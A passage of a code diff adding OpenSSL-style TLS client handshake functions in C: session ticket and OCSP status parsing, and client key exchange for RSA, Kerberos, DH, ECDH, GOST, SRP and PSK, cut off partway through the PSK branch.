+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_SESSION_TICKET_A,
+                                   SSL3_ST_CR_SESSION_TICKET_B,
+                                   SSL3_MT_NEWSESSION_TICKET, 16384, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    if (n < 6) {
+        /* need at least ticket_lifetime_hint + ticket length */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+
+    p = d = (unsigned char *)s->init_msg;
+    n2l(p, s->session->tlsext_tick_lifetime_hint);
+    n2s(p, ticklen);
+    /* ticket_lifetime_hint + ticket_length + ticket */
+    if (ticklen + 6 != n) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    if (s->session->tlsext_tick) {
+        OPENSSL_free(s->session->tlsext_tick);
+        s->session->tlsext_ticklen = 0;
+    }
+    s->session->tlsext_tick = OPENSSL_malloc(ticklen);
+    if (!s->session->tlsext_tick) {
+        SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    memcpy(s->session->tlsext_tick, p, ticklen);
+    s->session->tlsext_ticklen = ticklen;
+    /*
+     * There are two ways to detect a resumed ticket session. One is to set
+     * an appropriate session ID and then the server must return a match in
+     * ServerHello. This allows the normal client session ID matching to work
+     * and we know much earlier that the ticket has been accepted. The
+     * other way is to set zero length session ID when the ticket is
+     * presented and rely on the handshake to determine session resumption.
+     * We choose the former approach because this fits in with assumptions
+     * elsewhere in OpenSSL. The session ID is set to the SHA256 (or SHA1 is
+     * SHA256 is disabled) hash of the ticket.
+     */
+    EVP_Digest(p, ticklen,
+               s->session->session_id, &s->session->session_id_length,
+# ifndef OPENSSL_NO_SHA256
+               EVP_sha256(), NULL);
+# else
+               EVP_sha1(), NULL);
+# endif
+    ret = 1;
+    return (ret);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (-1);
+}
+
+int ssl3_get_cert_status(SSL *s)
+{
+    int ok, al;
+    unsigned long resplen, n;
+    const unsigned char *p;
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_CERT_STATUS_A,
+                                   SSL3_ST_CR_CERT_STATUS_B,
+                                   SSL3_MT_CERTIFICATE_STATUS, 16384, &ok);
+
+    if (!ok)
+        return ((int)n);
+    if (n < 4) {
+        /* need at least status type + length */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CERT_STATUS, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    p = (unsigned char *)s->init_msg;
+    if (*p++ != TLSEXT_STATUSTYPE_ocsp) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CERT_STATUS, SSL_R_UNSUPPORTED_STATUS_TYPE);
+        goto f_err;
+    }
+    n2l3(p, resplen);
+    if (resplen + 4 != n) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CERT_STATUS, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    if (s->tlsext_ocsp_resp)
+        OPENSSL_free(s->tlsext_ocsp_resp);
+    s->tlsext_ocsp_resp = BUF_memdup(p, resplen);
+    if (!s->tlsext_ocsp_resp) {
+        al = SSL_AD_INTERNAL_ERROR;
+        SSLerr(SSL_F_SSL3_GET_CERT_STATUS, ERR_R_MALLOC_FAILURE);
+        goto f_err;
+    }
+    s->tlsext_ocsp_resplen = resplen;
+    if (s->ctx->tlsext_status_cb) {
+        int ret;
+        ret = s->ctx->tlsext_status_cb(s, s->ctx->tlsext_status_arg);
+        if (ret == 0) {
+            al = SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE;
+            SSLerr(SSL_F_SSL3_GET_CERT_STATUS, SSL_R_INVALID_STATUS_RESPONSE);
+            goto f_err;
+        }
+        if (ret < 0) {
+            al = SSL_AD_INTERNAL_ERROR;
+            SSLerr(SSL_F_SSL3_GET_CERT_STATUS, ERR_R_MALLOC_FAILURE);
+            goto f_err;
+        }
+    }
+    return 1;
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    return (-1);
+}
+#endif
+
+int ssl3_get_server_done(SSL *s)
+{
+    int ok, ret = 0;
+    long n;
+
+    /* Second to last param should be very small, like 0 :-) */
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_SRVR_DONE_A,
+                                   SSL3_ST_CR_SRVR_DONE_B,
+                                   SSL3_MT_SERVER_DONE, 30, &ok);
+
+    if (!ok)
+        return ((int)n);
+    if (n > 0) {
+        /* should contain no data */
+        ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_DECODE_ERROR);
+        SSLerr(SSL_F_SSL3_GET_SERVER_DONE, SSL_R_LENGTH_MISMATCH);
+        return -1;
+    }
+    ret = 1;
+    return (ret);
+}
+
+int ssl3_send_client_key_exchange(SSL *s)
+{
+    unsigned char *p;
+    int n;
+    unsigned long alg_k;
+#ifndef OPENSSL_NO_RSA
+    unsigned char *q;
+    EVP_PKEY *pkey = NULL;
+#endif
+#ifndef OPENSSL_NO_KRB5
+    KSSL_ERR kssl_err;
+#endif                          /* OPENSSL_NO_KRB5 */
+#ifndef OPENSSL_NO_ECDH
+    EC_KEY *clnt_ecdh = NULL;
+    const EC_POINT *srvr_ecpoint = NULL;
+    EVP_PKEY *srvr_pub_pkey = NULL;
+    unsigned char *encodedPoint = NULL;
+    int encoded_pt_len = 0;
+    BN_CTX *bn_ctx = NULL;
+#endif
+
+    if (s->state == SSL3_ST_CW_KEY_EXCH_A) {
+        p = ssl_handshake_start(s);
+
+        alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+
+        /* Fool emacs indentation */
+        if (0) {
+        }
+#ifndef OPENSSL_NO_RSA
+        else if (alg_k & SSL_kRSA) {
+            RSA *rsa;
+            unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
+
+            if (s->session->sess_cert == NULL) {
+                /*
+                 * We should always have a server certificate with SSL_kRSA.
+                 */
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            if (s->session->sess_cert->peer_rsa_tmp != NULL)
+                rsa = s->session->sess_cert->peer_rsa_tmp;
+            else {
+                pkey =
+                    X509_get_pubkey(s->session->
+                                    sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].
+                                    x509);
+                if ((pkey == NULL) || (pkey->type != EVP_PKEY_RSA)
+                    || (pkey->pkey.rsa == NULL)) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_INTERNAL_ERROR);
+                    goto err;
+                }
+                rsa = pkey->pkey.rsa;
+                EVP_PKEY_free(pkey);
+            }
+
+            tmp_buf[0] = s->client_version >> 8;
+            tmp_buf[1] = s->client_version & 0xff;
+            if (RAND_bytes(&(tmp_buf[2]), sizeof tmp_buf - 2) <= 0)
+                goto err;
+
+            s->session->master_key_length = sizeof tmp_buf;
+
+            q = p;
+            /* Fix buf for TLS and beyond */
+            if (s->version > SSL3_VERSION)
+                p += 2;
+            n = RSA_public_encrypt(sizeof tmp_buf,
+                                   tmp_buf, p, rsa, RSA_PKCS1_PADDING);
+# ifdef PKCS1_CHECK
+            if (s->options & SSL_OP_PKCS1_CHECK_1)
+                p[1]++;
+            if (s->options & SSL_OP_PKCS1_CHECK_2)
+                tmp_buf[0] = 0x70;
+# endif
+            if (n <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_BAD_RSA_ENCRYPT);
+                goto err;
+            }
+
+            /* Fix buf for TLS and beyond */
+            if (s->version > SSL3_VERSION) {
+                s2n(n, q);
+                n += 2;
+            }
+
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            tmp_buf,
+                                                            sizeof tmp_buf);
+            OPENSSL_cleanse(tmp_buf, sizeof tmp_buf);
+        }
+#endif
+#ifndef OPENSSL_NO_KRB5
+        else if (alg_k & SSL_kKRB5) {
+            krb5_error_code krb5rc;
+            KSSL_CTX *kssl_ctx = s->kssl_ctx;
+            /*  krb5_data   krb5_ap_req;  */
+            krb5_data *enc_ticket;
+            krb5_data authenticator, *authp = NULL;
+            EVP_CIPHER_CTX ciph_ctx;
+            const EVP_CIPHER *enc = NULL;
+            unsigned char iv[EVP_MAX_IV_LENGTH];
+            unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
+            unsigned char epms[SSL_MAX_MASTER_KEY_LENGTH + EVP_MAX_IV_LENGTH];
+            int padl, outl = sizeof(epms);
+
+            EVP_CIPHER_CTX_init(&ciph_ctx);
+
+# ifdef KSSL_DEBUG
+            fprintf(stderr, "ssl3_send_client_key_exchange(%lx & %lx)\n",
+                    alg_k, SSL_kKRB5);
+# endif                         /* KSSL_DEBUG */
+
+            authp = NULL;
+# ifdef KRB5SENDAUTH
+            if (KRB5SENDAUTH)
+                authp = &authenticator;
+# endif                         /* KRB5SENDAUTH */
+
+            krb5rc = kssl_cget_tkt(kssl_ctx, &enc_ticket, authp, &kssl_err);
+            enc = kssl_map_enc(kssl_ctx->enctype);
+            if (enc == NULL)
+                goto err;
+# ifdef KSSL_DEBUG
+            {
+                fprintf(stderr, "kssl_cget_tkt rtn %d\n", krb5rc);
+                if (krb5rc && kssl_err.text)
+                    fprintf(stderr, "kssl_cget_tkt kssl_err=%s\n",
+                            kssl_err.text);
+            }
+# endif                         /* KSSL_DEBUG */
+
+            if (krb5rc) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, kssl_err.reason);
+                goto err;
+            }
+
+            /*-
+             * 20010406 VRS - Earlier versions used KRB5 AP_REQ
+             * in place of RFC 2712 KerberosWrapper, as in:
+             *
+             * Send ticket (copy to *p, set n = length)
+             * n = krb5_ap_req.length;
+             * memcpy(p, krb5_ap_req.data, krb5_ap_req.length);
+             * if (krb5_ap_req.data)
+             *   kssl_krb5_free_data_contents(NULL,&krb5_ap_req);
+             *
+             * Now using real RFC 2712 KerberosWrapper
+             * (Thanks to Simon Wilkinson <sxw@sxw.org.uk>)
+             * Note: 2712 "opaque" types are here replaced
+             * with a 2-byte length followed by the value.
+             * Example:
+             * KerberosWrapper= xx xx asn1ticket 0 0 xx xx encpms
+             * Where "xx xx" = length bytes.  Shown here with
+             * optional authenticator omitted.
+             */
+
+            /*  KerberosWrapper.Ticket              */
+            s2n(enc_ticket->length, p);
+            memcpy(p, enc_ticket->data, enc_ticket->length);
+            p += enc_ticket->length;
+            n = enc_ticket->length + 2;
+
+            /*  KerberosWrapper.Authenticator       */
+            if (authp && authp->length) {
+                s2n(authp->length, p);
+                memcpy(p, authp->data, authp->length);
+                p += authp->length;
+                n += authp->length + 2;
+
+                free(authp->data);
+                authp->data = NULL;
+                authp->length = 0;
+            } else {
+                s2n(0, p);      /* null authenticator length */
+                n += 2;
+            }
+
+            tmp_buf[0] = s->client_version >> 8;
+            tmp_buf[1] = s->client_version & 0xff;
+            if (RAND_bytes(&(tmp_buf[2]), sizeof tmp_buf - 2) <= 0)
+                goto err;
+
+            /*-
+             * 20010420 VRS.  Tried it this way; failed.
+             *      EVP_EncryptInit_ex(&ciph_ctx,enc, NULL,NULL);
+             *      EVP_CIPHER_CTX_set_key_length(&ciph_ctx,
+             *                              kssl_ctx->length);
+             *      EVP_EncryptInit_ex(&ciph_ctx,NULL, key,iv);
+             */
+
+            memset(iv, 0, sizeof iv); /* per RFC 1510 */
+            EVP_EncryptInit_ex(&ciph_ctx, enc, NULL, kssl_ctx->key, iv);
+            EVP_EncryptUpdate(&ciph_ctx, epms, &outl, tmp_buf,
+                              sizeof tmp_buf);
+            EVP_EncryptFinal_ex(&ciph_ctx, &(epms[outl]), &padl);
+            outl += padl;
+            if (outl > (int)sizeof epms) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            EVP_CIPHER_CTX_cleanup(&ciph_ctx);
+
+            /*  KerberosWrapper.EncryptedPreMasterSecret    */
+            s2n(outl, p);
+            memcpy(p, epms, outl);
+            p += outl;
+            n += outl + 2;
+
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            tmp_buf,
+                                                            sizeof tmp_buf);
+
+            OPENSSL_cleanse(tmp_buf, sizeof tmp_buf);
+            OPENSSL_cleanse(epms, outl);
+        }
+#endif
+#ifndef OPENSSL_NO_DH
+        else if (alg_k & (SSL_kEDH | SSL_kDHr | SSL_kDHd)) {
+            DH *dh_srvr, *dh_clnt;
+            SESS_CERT *scert = s->session->sess_cert;
+
+            if (scert == NULL) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_UNEXPECTED_MESSAGE);
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_UNEXPECTED_MESSAGE);
+                goto err;
+            }
+
+            if (scert->peer_dh_tmp != NULL)
+                dh_srvr = scert->peer_dh_tmp;
+            else {
+                /* we get them from the cert */
+                int idx = scert->peer_cert_type;
+                EVP_PKEY *spkey = NULL;
+                dh_srvr = NULL;
+                if (idx >= 0)
+                    spkey = X509_get_pubkey(scert->peer_pkeys[idx].x509);
+                if (spkey) {
+                    dh_srvr = EVP_PKEY_get1_DH(spkey);
+                    EVP_PKEY_free(spkey);
+                }
+                if (dh_srvr == NULL) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_INTERNAL_ERROR);
+                    goto err;
+                }
+            }
+            if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY) {
+                /* Use client certificate key */
+                EVP_PKEY *clkey = s->cert->key->privatekey;
+                dh_clnt = NULL;
+                if (clkey)
+                    dh_clnt = EVP_PKEY_get1_DH(clkey);
+                if (dh_clnt == NULL) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_INTERNAL_ERROR);
+                    goto err;
+                }
+            } else {
+                /* generate a new random key */
+                if ((dh_clnt = DHparams_dup(dh_srvr)) == NULL) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_DH_LIB);
+                    goto err;
+                }
+                if (!DH_generate_key(dh_clnt)) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_DH_LIB);
+                    DH_free(dh_clnt);
+                    goto err;
+                }
+            }
+
+            /*
+             * use the 'p' output buffer for the DH key, but make sure to
+             * clear it out afterwards
+             */
+
+            n = DH_compute_key(p, dh_srvr->pub_key, dh_clnt);
+            if (scert->peer_dh_tmp == NULL)
+                DH_free(dh_srvr);
+
+            if (n <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_DH_LIB);
+                DH_free(dh_clnt);
+                goto err;
+            }
+
+            /* generate master key from the result */
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            p, n);
+            /* clean up */
+            memset(p, 0, n);
+
+            if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
+                n = 0;
+            else {
+                /* send off the data */
+                n = BN_num_bytes(dh_clnt->pub_key);
+                s2n(n, p);
+                BN_bn2bin(dh_clnt->pub_key, p);
+                n += 2;
+            }
+
+            DH_free(dh_clnt);
+
+            /* perhaps clean things up a bit EAY EAY EAY EAY */
+        }
+#endif
+
+#ifndef OPENSSL_NO_ECDH
+        else if (alg_k & (SSL_kEECDH | SSL_kECDHr | SSL_kECDHe)) {
+            const EC_GROUP *srvr_group = NULL;
+            EC_KEY *tkey;
+            int ecdh_clnt_cert = 0;
+            int field_size = 0;
+
+            if (s->session->sess_cert == NULL) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_UNEXPECTED_MESSAGE);
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_UNEXPECTED_MESSAGE);
+                goto err;
+            }
+
+            /*
+             * Did we send out the client's ECDH share for use in premaster
+             * computation as part of client certificate? If so, set
+             * ecdh_clnt_cert to 1.
+             */
+            if ((alg_k & (SSL_kECDHr | SSL_kECDHe)) && (s->cert != NULL)) {
+                /*-
+                 * XXX: For now, we do not support client
+                 * authentication using ECDH certificates.
+                 * To add such support, one needs to add
+                 * code that checks for appropriate
+                 * conditions and sets ecdh_clnt_cert to 1.
+                 * For example, the cert have an ECC
+                 * key on the same curve as the server's
+                 * and the key should be authorized for
+                 * key agreement.
+                 *
+                 * One also needs to add code in ssl3_connect
+                 * to skip sending the certificate verify
+                 * message.
+                 *
+                 * if ((s->cert->key->privatekey != NULL) &&
+                 *     (s->cert->key->privatekey->type ==
+                 *      EVP_PKEY_EC) && ...)
+                 * ecdh_clnt_cert = 1;
+                 */
+            }
+
+            if (s->session->sess_cert->peer_ecdh_tmp != NULL) {
+                tkey = s->session->sess_cert->peer_ecdh_tmp;
+            } else {
+                /* Get the Server Public Key from Cert */
+                srvr_pub_pkey =
+                    X509_get_pubkey(s->session->
+                                    sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
+                if ((srvr_pub_pkey == NULL)
+                    || (srvr_pub_pkey->type != EVP_PKEY_EC)
+                    || (srvr_pub_pkey->pkey.ec == NULL)) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_INTERNAL_ERROR);
+                    goto err;
+                }
+
+                tkey = srvr_pub_pkey->pkey.ec;
+            }
+
+            srvr_group = EC_KEY_get0_group(tkey);
+            srvr_ecpoint = EC_KEY_get0_public_key(tkey);
+
+            if ((srvr_group == NULL) || (srvr_ecpoint == NULL)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+
+            if ((clnt_ecdh = EC_KEY_new()) == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+
+            if (!EC_KEY_set_group(clnt_ecdh, srvr_group)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+                goto err;
+            }
+            if (ecdh_clnt_cert) {
+                /*
+                 * Reuse key info from our certificate We only need our
+                 * private key to perform the ECDH computation.
+                 */
+                const BIGNUM *priv_key;
+                tkey = s->cert->key->privatekey->pkey.ec;
+                priv_key = EC_KEY_get0_private_key(tkey);
+                if (priv_key == NULL) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                if (!EC_KEY_set_private_key(clnt_ecdh, priv_key)) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_EC_LIB);
+                    goto err;
+                }
+            } else {
+                /* Generate a new ECDH key pair */
+                if (!(EC_KEY_generate_key(clnt_ecdh))) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_ECDH_LIB);
+                    goto err;
+                }
+            }
+
+            /*
+             * use the 'p' output buffer for the ECDH key, but make sure to
+             * clear it out afterwards
+             */
+
+            field_size = EC_GROUP_get_degree(srvr_group);
+            if (field_size <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+            n = ECDH_compute_key(p, (field_size + 7) / 8, srvr_ecpoint,
+                                 clnt_ecdh, NULL);
+            if (n <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_ECDH_LIB);
+                goto err;
+            }
+
+            /* generate master key from the result */
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            p, n);
+
+            memset(p, 0, n);    /* clean up */
+
+            if (ecdh_clnt_cert) {
+                /* Send empty client key exch message */
+                n = 0;
+            } else {
+                /*
+                 * First check the size of encoding and allocate memory
+                 * accordingly.
+                 */
+                encoded_pt_len =
+                    EC_POINT_point2oct(srvr_group,
+                                       EC_KEY_get0_public_key(clnt_ecdh),
+                                       POINT_CONVERSION_UNCOMPRESSED,
+                                       NULL, 0, NULL);
+
+                encodedPoint = (unsigned char *)
+                    OPENSSL_malloc(encoded_pt_len * sizeof(unsigned char));
+                bn_ctx = BN_CTX_new();
+                if ((encodedPoint == NULL) || (bn_ctx == NULL)) {
+                    SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                           ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+
+                /* Encode the public key */
+                n = EC_POINT_point2oct(srvr_group,
+                                       EC_KEY_get0_public_key(clnt_ecdh),
+                                       POINT_CONVERSION_UNCOMPRESSED,
+                                       encodedPoint, encoded_pt_len, bn_ctx);
+
+                *p = n;         /* length of encoded point */
+                /* Encoded point will be copied here */
+                p += 1;
+                /* copy the point */
+                memcpy((unsigned char *)p, encodedPoint, n);
+                /* increment n to account for length field */
+                n += 1;
+            }
+
+            /* Free allocated memory */
+            BN_CTX_free(bn_ctx);
+            if (encodedPoint != NULL)
+                OPENSSL_free(encodedPoint);
+            if (clnt_ecdh != NULL)
+                EC_KEY_free(clnt_ecdh);
+            EVP_PKEY_free(srvr_pub_pkey);
+        }
+#endif                          /* !OPENSSL_NO_ECDH */
+        else if (alg_k & SSL_kGOST) {
+            /* GOST key exchange message creation */
+            EVP_PKEY_CTX *pkey_ctx;
+            X509 *peer_cert;
+            size_t msglen;
+            unsigned int md_len;
+            int keytype;
+            unsigned char premaster_secret[32], shared_ukm[32], tmp[256];
+            EVP_MD_CTX *ukm_hash;
+            EVP_PKEY *pub_key;
+
+            /*
+             * Get server sertificate PKEY and create ctx from it
+             */
+            peer_cert =
+                s->session->
+                sess_cert->peer_pkeys[(keytype = SSL_PKEY_GOST01)].x509;
+            if (!peer_cert)
+                peer_cert =
+                    s->session->
+                    sess_cert->peer_pkeys[(keytype = SSL_PKEY_GOST94)].x509;
+            if (!peer_cert) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_NO_GOST_CERTIFICATE_SENT_BY_PEER);
+                goto err;
+            }
+
+            pkey_ctx = EVP_PKEY_CTX_new(pub_key =
+                                        X509_get_pubkey(peer_cert), NULL);
+            /*
+             * If we have send a certificate, and certificate key
+             *
+             * * parameters match those of server certificate, use
+             * certificate key for key exchange
+             */
+
+            /* Otherwise, generate ephemeral key pair */
+
+            EVP_PKEY_encrypt_init(pkey_ctx);
+            /* Generate session key */
+            RAND_bytes(premaster_secret, 32);
+            /*
+             * If we have client certificate, use its secret as peer key
+             */
+            if (s->s3->tmp.cert_req && s->cert->key->privatekey) {
+                if (EVP_PKEY_derive_set_peer
+                    (pkey_ctx, s->cert->key->privatekey) <= 0) {
+                    /*
+                     * If there was an error - just ignore it. Ephemeral key
+                     * * would be used
+                     */
+                    ERR_clear_error();
+                }
+            }
+            /*
+             * Compute shared IV and store it in algorithm-specific context
+             * data
+             */
+            ukm_hash = EVP_MD_CTX_create();
+            EVP_DigestInit(ukm_hash,
+                           EVP_get_digestbynid(NID_id_GostR3411_94));
+            EVP_DigestUpdate(ukm_hash, s->s3->client_random,
+                             SSL3_RANDOM_SIZE);
+            EVP_DigestUpdate(ukm_hash, s->s3->server_random,
+                             SSL3_RANDOM_SIZE);
+            EVP_DigestFinal_ex(ukm_hash, shared_ukm, &md_len);
+            EVP_MD_CTX_destroy(ukm_hash);
+            if (EVP_PKEY_CTX_ctrl
+                (pkey_ctx, -1, EVP_PKEY_OP_ENCRYPT, EVP_PKEY_CTRL_SET_IV, 8,
+                 shared_ukm) < 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_LIBRARY_BUG);
+                goto err;
+            }
+            /* Make GOST keytransport blob message */
+            /*
+             * Encapsulate it into sequence
+             */
+            *(p++) = V_ASN1_SEQUENCE | V_ASN1_CONSTRUCTED;
+            msglen = 255;
+            if (EVP_PKEY_encrypt(pkey_ctx, tmp, &msglen, premaster_secret, 32)
+                < 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_LIBRARY_BUG);
+                goto err;
+            }
+            if (msglen >= 0x80) {
+                *(p++) = 0x81;
+                *(p++) = msglen & 0xff;
+                n = msglen + 3;
+            } else {
+                *(p++) = msglen & 0xff;
+                n = msglen + 2;
+            }
+            memcpy(p, tmp, msglen);
+            /* Check if pubkey from client certificate was used */
+            if (EVP_PKEY_CTX_ctrl
+                (pkey_ctx, -1, -1, EVP_PKEY_CTRL_PEER_KEY, 2, NULL) > 0) {
+                /* Set flag "skip certificate verify" */
+                s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
+            }
+            EVP_PKEY_CTX_free(pkey_ctx);
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            premaster_secret,
+                                                            32);
+            EVP_PKEY_free(pub_key);
+
+        }
+#ifndef OPENSSL_NO_SRP
+        else if (alg_k & SSL_kSRP) {
+            if (s->srp_ctx.A != NULL) {
+                /* send off the data */
+                n = BN_num_bytes(s->srp_ctx.A);
+                s2n(n, p);
+                BN_bn2bin(s->srp_ctx.A, p);
+                n += 2;
+            } else {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            if (s->session->srp_username != NULL)
+                OPENSSL_free(s->session->srp_username);
+            s->session->srp_username = BUF_strdup(s->srp_ctx.login);
+            if (s->session->srp_username == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+
+            if ((s->session->master_key_length =
+                 SRP_generate_client_master_secret(s,
+                                                   s->session->master_key)) <
+                0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+        }
+#endif
+#ifndef OPENSSL_NO_PSK
+        else if (alg_k & SSL_kPSK) {
+            /*
+             * The callback needs PSK_MAX_IDENTITY_LEN + 1 bytes to return a
+             * \0-terminated identity. The last byte is for us for simulating
+             * strnlen.
+             */
+            char identity[PSK_MAX_IDENTITY_LEN + 2];
+            size_t identity_len;
+            unsigned char *t = NULL;
+            unsigned char psk_or_pre_ms[PSK_MAX_PSK_LEN * 2 + 4];
+            unsigned int pre_ms_len = 0, psk_len = 0;
+            int psk_err = 1;
+
+            n = 0;
+            if (s->psk_client_callback == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_PSK_NO_CLIENT_CB);
+                goto err;
+            }
+
+            memset(identity, 0, sizeof(identity));
+            psk_len = s->psk_client_callback(s, s->ctx->psk_identity_hint,
+                                             identity, sizeof(identity) - 1,
+                                             psk_or_pre_ms,
+                                             sizeof(psk_or_pre_ms));
+            if (psk_len > PSK_MAX_PSK_LEN) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto psk_err;
+            } else if (psk_len == 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       SSL_R_PSK_IDENTITY_NOT_FOUND);
+                goto psk_err;
+            }
+            identity[PSK_MAX_IDENTITY_LEN + 1] = '\0';
+            identity_len = strlen(identity);
+            if (identity_len > PSK_MAX_IDENTITY_LEN) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_INTERNAL_ERROR);
+                goto psk_err;
+            }
+            /* create PSK pre_master_secret */
+            pre_ms_len = 2 + psk_len + 2 + psk_len;
+            t = psk_or_pre_ms;
+            memmove(psk_or_pre_ms + psk_len + 4, psk_or_pre_ms, psk_len);
+            s2n(psk_len, t);
+            memset(t, 0, psk_len);
+            t += psk_len;
+            s2n(psk_len, t);
+
+            if (s->session->psk_identity_hint != NULL)
+                OPENSSL_free(s->session->psk_identity_hint);
+            s->session->psk_identity_hint =
+                BUF_strdup(s->ctx->psk_identity_hint);
+            if (s->ctx->psk_identity_hint != NULL
+                && s->session->psk_identity_hint == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto psk_err;
+            }
+
+            if (s->session->psk_identity != NULL)
+                OPENSSL_free(s->session->psk_identity);
+            s->session->psk_identity = BUF_strdup(identity);
+            if (s->session->psk_identity == NULL) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
+                       ERR_R_MALLOC_FAILURE);
+                goto psk_err;
+            }
+
+            s->session->master_key_length =
+                s->method->ssl3_enc->generate_master_secret(s,
+                                                            s->
+                                                            session->master_key,
+                                                            psk_or_pre_ms,
